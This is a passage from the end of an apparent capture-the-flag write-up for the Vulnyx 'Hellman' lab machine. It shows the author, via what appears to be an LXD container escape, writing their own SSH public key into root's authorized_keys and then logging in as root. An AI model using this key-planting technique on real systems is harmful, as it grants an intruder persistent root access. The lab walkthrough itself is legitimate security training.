-rw-r--r--    1 root     root           632 Jan 28 05:48 root.txt
/mnt/root/root # cd .ssh
/mnt/root/root/.ssh # ls
/mnt/root/root/.ssh # echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
/mnt/root/root/.ssh # 
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/home/kali/Desktop/lxd-alpine-builder-master]
└─# ssh root@192.168.56.253
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
Hellman:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Hellman:~#
#Vulnyx
Vulnyx-Hellman
http://example.com/2026/02/04/Vulnyx-Hellman/
Author
Skyarrow
Posted on
February 4, 2026
Licensed under